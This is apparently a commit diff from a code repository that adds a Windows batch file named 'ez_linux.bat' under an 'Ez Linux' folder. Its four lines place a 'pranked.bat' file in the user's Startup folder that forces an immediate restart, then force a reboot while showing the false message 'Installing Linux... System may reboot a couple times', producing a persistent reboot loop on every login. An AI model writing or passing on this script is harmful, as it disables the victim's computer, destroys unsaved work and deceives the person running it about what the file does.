diff options
Diffstat (limited to 'Ez Linux')
-rw-r--r-- | Ez Linux/ez_linux.bat | 4 |
1 files changed, 4 insertions, 0 deletions
diff --git a/Ez Linux/ez_linux.bat b/Ez Linux/ez_linux.bat new file mode 100644 index 0000000..4fca6ea --- /dev/null +++ b/Ez Linux/ez_linux.bat @@ -0,0 +1,4 @@ +cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" +echo @echo off > pranked.bat +echo shutdown /r /f /t 0 >>pranked.bat +shutdown /r /f /c "Installing Linux... System may reboot a couple times" /t 10 |